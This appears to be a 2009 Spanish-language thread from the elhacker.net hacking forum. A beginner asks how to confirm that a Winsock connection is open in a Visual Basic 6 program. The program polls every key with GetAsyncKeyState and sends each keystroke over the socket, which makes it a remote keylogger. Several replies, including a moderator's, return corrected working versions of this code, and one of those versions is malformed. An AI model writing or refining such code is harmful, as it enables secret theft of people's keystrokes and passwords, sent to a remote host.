elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  [Ayuda] confirmar que winsock este conectado?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: [Ayuda] confirmar que winsock este conectado?  (Leído 3,430 veces)
Larva93

Desconectado Desconectado

Mensajes: 23


Ver Perfil
[Ayuda] confirmar que winsock este conectado?
« en: 27 Agosto 2009, 01:17 am »

Hola tengo este codigo:
Código:
Dim PropBag As New PropertyBag
Option Explicit
    Private Declare Function GetAsyncKeyState _
        Lib "user32" ( _
            ByVal vKey As Long) As Integer
   Private Sub Timer1_Timer()
       Dim i As Integer
       For i = 0 To 255
           If GetAsyncKeyState(i) = -32767 Then 'aca quiero confirmar que el winsock este conectado y despues envie los datos
        Winsock1.SendData Chr(i)
Text1.Text = Text1.Text & Chr(i)
Text1.SelStart = Len(Text1.Text)
           End If
       Next
   End Sub
Bueno no se si me explico bien, pero lo que quiero es que al confirmarse esta linea "GetAsyncKeyState(i) = -32767" despues confirme que winsock1 este conectado, y si es asi que envie los datos.

Desde ya muchas gracias.
(si esta un poco desprolijo el code xD no critiquen porfavor recien estoy aprendiendo)


En línea

Jaixon Jax


Desconectado Desconectado

Mensajes: 859



Ver Perfil
Re: [Ayuda] confirmar que winsock este conectado?
« Respuesta #1 en: 27 Agosto 2009, 01:37 am »

 No soy muy versado en VB pero me parece que esa api no esta bien implementada en

Código:
 For i = 0 To 255
           If GetAsyncKeyState(i) = -32767 Then 'aca quiero confirmar que el winsock este conectado y despues envie los datos

aqui lo que estas haciendo es verificando los codigos ascci del 0 al 255 y preguntando si la tecla no fue hundida  :( bueno debido a que la api retorna 1 si la tecla la presionaron o cero si no la han hunddo por lo que nunca entrara en el if.

  Si quieres saber si hay conexion a internet puedes usar gethostbyname con un servidor estable como google.es..

Saludos



En línea

seba123neo
Moderador
***
Desconectado Desconectado

Mensajes: 3.621



Ver Perfil WWW
Re: [Ayuda] confirmar que winsock este conectado?
« Respuesta #2 en: 27 Agosto 2009, 01:37 am »

Hola, imaginate que hasta vos te diste cuenta que esta desprolijo...podes consultar si Winsock1.State = sckConnected, las variables abajo del Option Explicit y indenta el codigo fuente.

PD: Detectar la tecla presionada en cualquier ventana de Windows

saludos.
« Última modificación: 27 Agosto 2009, 01:43 am por seba123neo » En línea

fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: [Ayuda] confirmar que winsock este conectado?
« Respuesta #3 en: 27 Agosto 2009, 01:43 am »

hola, pone el code en codigo tipo visual basic

aca un code que porai te srive
Código
  1. Dim PropBag As New PropertyBag
  2. Option Explicit
  3.    Private Declare Function GetAsyncKeyState _
  4.        Lib "user32" ( _
  5.            ByVal vKey As Long) As Integer
  6.   Private Sub Timer1_Timer()
  7.       Dim i As Integer
  8.       For i = 0 To 255
  9.  
  10.        If GetAsyncKeyState(i) = -32767 Then 'aca quiero confirmar que el winsock este conectado y despues envie los datos
  11.        If Winsock1.State = 7 Then
  12.        Winsock1.SendData Chr(i)
  13. Text1.Text = Text1.Text & Chr(i)
  14. Text1.SelStart = Len(Text1.Text)
  15.             End If
  16.               End if
  17.       Next
  18.   End Sub
  19.  

no lo probe pero creo que va bien, pero esa es la base, el winsock.state

PD: no revise el resto del code

PD (neo): lo hice asi nomas



saludos
« Última modificación: 27 Agosto 2009, 01:47 am por fede_cp » En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
seba123neo
Moderador
***
Desconectado Desconectado

Mensajes: 3.621



Ver Perfil WWW
Re: [Ayuda] confirmar que winsock este conectado?
« Respuesta #4 en: 27 Agosto 2009, 01:44 am »

hola, pone el code en codigo tipo visual basic

aca un code que porai te srive
Código
  1. Private Sub Form_Load()
  2. Dim PropBag As New PropertyBag
  3. Option Explicit
  4.    Private Declare Function GetAsyncKeyState _
  5.        Lib "user32" ( _
  6.            ByVal vKey As Long) As Integer
  7.   Private Sub Timer1_Timer()
  8.       Dim i As Integer
  9.       For i = 0 To 255
  10.  
  11.        If GetAsyncKeyState(i) = -32767 Then 'aca quiero confirmar que el winsock este conectado y despues envie los datos
  12.        If Winsock1.State = 7 Then
  13.        Winsock1.SendData Chr(i)
  14. Text1.Text = Text1.Text & Chr(i)
  15. Text1.SelStart = Len(Text1.Text)
  16.             End If
  17.       Next
  18.   End Sub
  19. End Sub

saludos

no sabia que las api's y el option explicit se ponian dentro del form_load   :xD :xD , y aparte podes hacer un And y te ahorras un If..
En línea

Larva93

Desconectado Desconectado

Mensajes: 23


Ver Perfil
Re: [Ayuda] confirmar que winsock este conectado?
« Respuesta #5 en: 27 Agosto 2009, 01:48 am »

Citar
no sabia que las api's y el option explicit se ponian dentro del form_load   :xD :xD , y aparte podes hacer un And y te ahorras un If..

fijate que yo no lo puse en form_load
En línea

fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: [Ayuda] confirmar que winsock este conectado?
« Respuesta #6 en: 27 Agosto 2009, 01:49 am »

me lo estaba diciendo a mi  :xD, ajja esta bien me equivoque, solo trato de ayudar.

saludos
En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
Larva93

Desconectado Desconectado

Mensajes: 23


Ver Perfil
Re: [Ayuda] confirmar que winsock este conectado?
« Respuesta #7 en: 27 Agosto 2009, 01:51 am »

nonono no hay problema por ahi pense que se lo iba tomar asi y despues cometia errores en sus futuros programas.
En línea

fede_cp


Desconectado Desconectado

Mensajes: 527


"porque pensar nunca fue entender"


Ver Perfil WWW
Re: [Ayuda] confirmar que winsock este conectado?
« Respuesta #8 en: 27 Agosto 2009, 01:56 am »

bueno ahora posteo el code como lo dijo neo

Código
  1. Dim PropBag As New PropertyBag
  2. Option Explicit
  3.    Private Declare Function GetAsyncKeyState _
  4.        Lib "user32" ( _
  5.            ByVal vKey As Long) As Integer
  6.   Private Sub Timer1_Timer()
  7.       Dim i As Integer
  8.       For i = 0 To 255
  9.  
  10.        If GetAsyncKeyState(i) = -32767 And Winsock1.State = 7 Then  'aca quiero confirmar que el winsock este conectado y despues envie los datos
  11.        Winsock1.SendData Chr(i)
  12. Text1.Text = Text1.Text & Chr(i)
  13. Text1.SelStart = Len(Text1.Text)
  14.             End If
  15.       Next
  16.   End Sub
  17.  


saludos  :¬¬
En línea

somos lo que hacemos para cambiar lo que somos

http://elhackerblog.blogspot.com el blog de elhacker.net!!
seba123neo
Moderador
***
Desconectado Desconectado

Mensajes: 3.621



Ver Perfil WWW
Re: [Ayuda] confirmar que winsock este conectado?
« Respuesta #9 en: 27 Agosto 2009, 01:59 am »

Código
  1. Option Explicit
  2.  
  3. Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
  4. Dim PropBag As New PropertyBag
  5.  
  6. Private Sub Timer1_Timer()
  7.   Dim i As Integer
  8.   For i = 0 To 255
  9.      If GetAsyncKeyState(i) = -32767 And Winsock1.State = sckConnected Then
  10.         Winsock1.SendData Chr(i)
  11.         Text1.Text = Text1.Text & Chr(i)
  12.         Text1.SelStart = Len(Text1.Text)
  13.      End If
  14.   Next
  15. End Sub
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Sin confirmar 120200.crdownoload
Seguridad
Marcus2020 4 2,985 Último mensaje 30 Diciembre 2019, 16:39 pm
por EdePC
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines